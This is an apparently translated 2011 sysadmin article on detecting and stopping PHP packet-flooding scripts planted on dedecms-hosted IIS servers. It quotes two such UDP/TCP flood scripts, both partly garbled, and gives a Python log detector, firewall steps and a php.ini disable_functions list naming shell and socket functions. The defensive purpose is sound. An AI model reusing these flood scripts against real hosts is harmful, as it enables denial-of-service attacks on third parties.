The ultimate solution to server crashes caused by PHP outbound packet flooding

December 28, 2011
This note summarizes the ultimate solution to server crashes caused by PHP outbound packet-flooding scripts planted on dedecms sites, in the hope that it helps customers fix the server problem and keep their websites running well.
I. Analysis of PHP outbound packet flooding
The script uses PHP socket calls so that the server itself sends packets at other IPs over the network. The common code looks like this:
Here is the code snippet:
<?php
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand
";
$max_time = $time + $exec_time;
for ($i = 0; $i $max_time) {   // loop header is truncated in the page's copy of the script
    break;
}
    $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $out);   // $out is never defined in the page's copy of the script
        fclose($fp);
    }
}
echo "Packet complete at " . time('h:i:s') . " with
$packets (" . round(($packets * 65) / 1024, 2) . " MB) packets averaging " .
round($packets / $exec_time, 2) . " packets/s\n";
?>
II. Symptoms
While IIS is running, the server's outgoing bandwidth is exhausted: the server is constantly sending packets to others. This is the reverse of being the target of a DDoS attack, where the server constantly receives large numbers of packets.
Recently a large number of servers have run into this problem because of dedecms vulnerabilities.
How do you find the affected sites quickly? Open the log file C:\Windows\System32\LogFiles\HTTPERR\httperr...log for today's date; it contains records like this one:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 http/1.1 get/xxxx/xxxxxx.php?host=122.224.32.100&port= 445&TIME=120 503 783 Disabled 30_freehost_1
The last three fields are 783 Disabled 30_freehost_1: 783 is the ID of this site in IIS, and 30_freehost_1 is the application pool.
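As an added example (not from the original article), here is a small Python script that applies the check just described to HTTPERR log text: it parses each record, flags requests whose query string carries a target plus port and time parameters like the ones the flood scripts read, and counts hits per IIS site ID and pool so you know which site to stop. The log lines are constructed to mirror the record quoted above.

```python
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed HTTPERR records modelled on the line quoted in the text; the
# trailing fields are sc-status, s-siteid, s-reason and s-queuename (the pool).
SAMPLE_LOG = """\
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&TIME=120 503 783 Disabled 30_freehost_1
2011-04-26 06:37:29 58.255.112.112 26818 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?ip=122.224.32.100&port=80&time=300 503 783 Disabled 30_freehost_1
2011-04-26 06:38:01 10.0.0.5 51000 98.126.247.13 80 - - - - - Timer_ConnectionIdle -
2011-04-26 06:38:05 10.0.0.9 51002 98.126.247.13 80 HTTP/1.1 POST /plus/search.php?keyword=dedecms 503 900 QueueFull 90_shop
"""

TARGET_KEYS = {"host", "ip"}       # where the flood script is told to send
REQUIRED_KEYS = {"port", "time"}   # destination port and run time


def parse_httperr_line(line):
    """Split one HTTPERR record; None for header lines or records without a URI."""
    if not line.strip() or line.startswith("#"):
        return None
    fields = line.split()
    uri = next((f for f in fields if f.startswith("/")), None)
    if uri is None or len(fields) < 10:
        return None
    status, site_id, reason, queue = fields[-4:]
    return {"when": f"{fields[0]} {fields[1]}", "client": fields[2], "uri": uri,
            "status": status, "site_id": site_id, "reason": reason, "queue": queue}


def is_flood_request(uri):
    """True when the query names a target (host/ip) together with port and time."""
    keys = {k.lower() for k in parse_qs(urlsplit(uri).query)}
    return REQUIRED_KEYS <= keys and bool(keys & TARGET_KEYS)


def flag_flood_requests(log_text):
    """Return the matching records and a Counter of hits per (site_id, queue)."""
    hits, per_site = [], Counter()
    for line in log_text.splitlines():
        rec = parse_httperr_line(line)
        if rec and is_flood_request(rec["uri"]):
            hits.append(rec)
            per_site[(rec["site_id"], rec["queue"])] += 1
    return hits, per_site


if __name__ == "__main__":
    for (site, pool), n in flag_flood_requests(SAMPLE_LOG)[1].most_common():
        print(f"IIS site {site} in pool {pool}: {n} suspicious request(s)")
```

Run it against the real httperr log by reading the file into `flag_flood_requests`; idle-timeout records with no URI are skipped rather than mis-parsed.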
III. Solutions
1. Use the fields above to locate the site and stop it, or stop the application pool and restart IIS.
2. In the IP security policy or the firewall, block all outgoing UDP.
Alternatively, adjust the IP policy so that UDP may only reach specific DNS server IPs, such as 8.8.8.8; unless the attacker targets that very IP, the attack has no effect. You can also configure on the network card a DNS IP that only you know and never expose, and then call the UDP-allow part of the IP policy for name resolution. (Open the IP policy properties, double-click to open it, delete either one of the two open UDP records, double-click the remaining one, change the address from the source address to the destination address of a specific IP, set it to your own DNS IP such as 8.8.8.8, and save.)
3. With the "first-class information monitoring" tool, add the keyword port= to both SQL interception and URL interception (other keywords can be deleted).
4. You can also block the above code directly by editing Win\php.ini and restarting IIS:
ignore_user_abort = On
(remove the leading ; so the directive takes effect)
disable_functions = exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
and append at the end:
fsockopen,set_time_limit
But this will stop many PHP programs from working normally.
Incidentally, it also shows that your server's security is otherwise decent: if the attacker could fully break in, they would escalate privileges directly rather than bother with DoS.
Recently a new TCP-based PHP DDoS script has appeared; its code is as follows:
Here is the code snippet:
<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);
if (strlen($host) == 0 or strlen($port) == 0 or strlen($exec_time) == 0) {
    if (strlen($_GET['rat']) 0) {   // comparison operator is missing in the page's copy of the script
        echo $_GET['rat'] . $_SERVER['HTTP_HOST'] . gethostbyname($_SERVER['SERVER_NAME']) .
            php_uname() . '|' . $_SERVER['SERVER_SOFTWARE'] . $_GET['rat'];
        exit;
    }
    exit;
}
$max_time = time() + $exec_time;
while (1) {
    $packets++;
    if (time() > $max_time or $exec_time != 69) {
        break;
    }
    $fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}
?>
Similarly, the following measures can be taken:
1. You can also block the above code directly by editing Win\php.ini and restarting IIS:
ignore_user_abort = On
(remove the leading ; so the directive takes effect)
disable_functions = exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
and append at the end:
fsockopen,set_time_limit
But this will stop many PHP programs from working normally. If you are an IDC providing hosting space to customers, disabling these functions may prevent customer programs from running, so this method is generally not used.
2. Block all outbound TCP packets in the IP policy; however, this breaks content-collection features and cannot be used on the master server.
3. On the server, search all PHP files for the keywords tcp: or udp:, find the attack file, and delete it.